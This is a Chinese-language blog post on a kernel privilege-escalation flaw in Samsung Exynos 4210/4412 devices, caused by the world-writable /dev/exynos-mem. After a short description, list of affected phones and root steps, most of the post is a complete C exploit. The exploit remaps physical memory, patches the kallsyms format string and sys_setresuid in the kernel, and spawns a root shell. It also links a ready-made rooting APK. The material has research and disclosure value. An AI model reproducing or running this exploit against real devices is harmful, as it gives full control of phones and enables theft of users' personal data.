本文章由Jack_Jia编写,转载请注明出处。
文章链接:http://blog.csdn.net/jiazhijun/article/details/8634179
作者:Jack_Jia 邮箱:309zhijun@163.com
一、漏洞描述
该漏洞为三星Exynos 4210或4412处理器设备上一个重大内核漏洞。黑客利用该漏洞可以轻易获得系统的root权限,进行内核注入,获得内存中数据,以及执行其他危害性极大的操作,从而达到更改和盗取用户敏感个人数据,甚至可以让手机无法使用。
在XDA开发者论坛上有黑客已经做出APK文件(http://forum.xda-developers.com/showthread.php?t=2130276),任何人通过此APK文件可以轻易取得用户设备的根权限,完全控制用户手机。
二、影响版本
Samsung Galaxy S2/S3
Samsung Galxy Note 1/2
魅族 MX四核 / MX2
其它使用Exynos 4210 & 4412和三星内核源码的机器
三、漏洞原理
该漏洞存在于Android Kernel中,/dev/exynos-mem(三星读写物理内存设备)存在权限漏洞,导致任意程序在非root下可以通过该设备接口操作物理内存。
四、POC代码
Root步骤:
1、程序打开"/dev/exynos-mem"内存影射,然后在内存中查找"%pK%c%s "并替换"%p"(用于强制显示内核描述符),
2、然后打开“/proc/kallsyms”文件,找到sys_setresuid(该函数为root权限管理函数)函数地址进行修改。
/*
* exynos-mem device abuse by alephzain
*
* /dev/exynos-mem is present on GS3/GS2/GN2/MEIZU MX
*
* the device is R/W by all users :
* crw-rw-rw- 1 system graphics 1, 14 Dec 13 20:24 /dev/exynos-mem
*
*/
/*
* Abuse it for root shell
*/
#include <stdio.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <sys/ioctl.h>
#include <stdbool.h>
#define PAGE_OFFSET 0xC0000000
#define PHYS_OFFSET 0x40000000
int main(int argc, char **argv, char **env) {
int fd, i, m, index, result;
unsigned long *paddr = NULL;
unsigned long *tmp = NULL;
unsigned long *restore_ptr_fmt = NULL;
unsigned long *restore_ptr_setresuid = NULL;
unsigned long addr_sym;
int page_size = sysconf(_SC_PAGE_SIZE);
int length = page_size * page_size;
/* for root shell */
char *cmd[2];
cmd[0] = "/system/bin/sh";
cmd[1] = NULL;
/* /proc/kallsyms parsing */
FILE *kallsyms = NULL;
char line [512];
char *ptr;
char *str;
bool found = false;
/* open the door */
fd = open("/dev/exynos-mem", O_RDWR);
if (fd == -1) {
printf("[!] Error opening /dev/exynos-mem\n");
exit(1);
}
/* kernel reside at the start of physical memory, so take some Mb */
paddr = (unsigned long *)mmap(NULL, length, PROT_READ|PROT_WRITE, MAP_SHARED, fd, PHYS_OFFSET);
tmp = paddr;
if (paddr == MAP_FAILED) {
printf("[!] Error mmap: %s|%08X\n",strerror(errno), i);
exit(1);
}
/*
* search the format string "%pK %c %s\n" in memory
* and replace "%pK" by "%p" to force display kernel
* symbols pointer
*/
for(m = 0; m < length; m += 4) {
if(*(unsigned long *)tmp == 0x204b7025 && *(unsigned long *)(tmp+1) == 0x25206325 && *(unsigned long *)(tmp+2) == 0x00000a73 ) {
printf("[*] s_show->seq_printf format string found at: 0x%08X\n", PAGE_OFFSET + m);
restore_ptr_fmt = tmp;
*(unsigned long*)tmp = 0x20207025;
found = true;
break;
}
tmp++;
}
if (found == false) {
printf("[!] s_show->seq_printf format string not found\n");
exit(1);
}
found = false;
/* kallsyms now display symbols address */
kallsyms = fopen("/proc/kallsyms", "r");
if (kallsyms == NULL) {
printf("[!] kallsysms error: %s\n", strerror(errno));
exit(1);
}
/* parse /proc/kallsyms to find sys_setresuid address */
while((ptr = fgets(line, 512, kallsyms))) {
str = strtok(ptr, " ");
addr_sym = strtoul(str, NULL, 16);
index = 1;
while(str) {
str = strtok(NULL, " ");
index++;
if (index == 3) {
if (strncmp("sys_setresuid\n", str, 14) == 0) {
printf("[*] sys_setresuid found at 0x%08X\n",addr_sym);
found = true;
}
break;
}
}
if (found) {
tmp = paddr;
tmp += (addr_sym - PAGE_OFFSET) >> 2;
for(m = 0; m < 128; m += 4) {
if (*(unsigned long *)tmp == 0xe3500000) {
printf("[*] patching sys_setresuid at 0x%08X\n",addr_sym+m);
restore_ptr_setresuid = tmp;
*(unsigned long *)tmp = 0xe3500001;
break;
}
tmp++;
}
break;
}
}
fclose(kallsyms);
/* to be sure memory is updated */
usleep(100000);
/* ask for root */
result = setresuid(0, 0, 0);
/* restore memory */
*(unsigned long *)restore_ptr_fmt = 0x204b7025;
*(unsigned long *)restore_ptr_setresuid = 0xe3500000;
munmap(paddr, length);
close(fd);
if (result) {
printf("[!] set user root failed: %s\n", strerror(errno));
exit(1);
}
/* execute a root shell */
execve (cmd[0], cmd, env);
return 0;
}
五、相关链接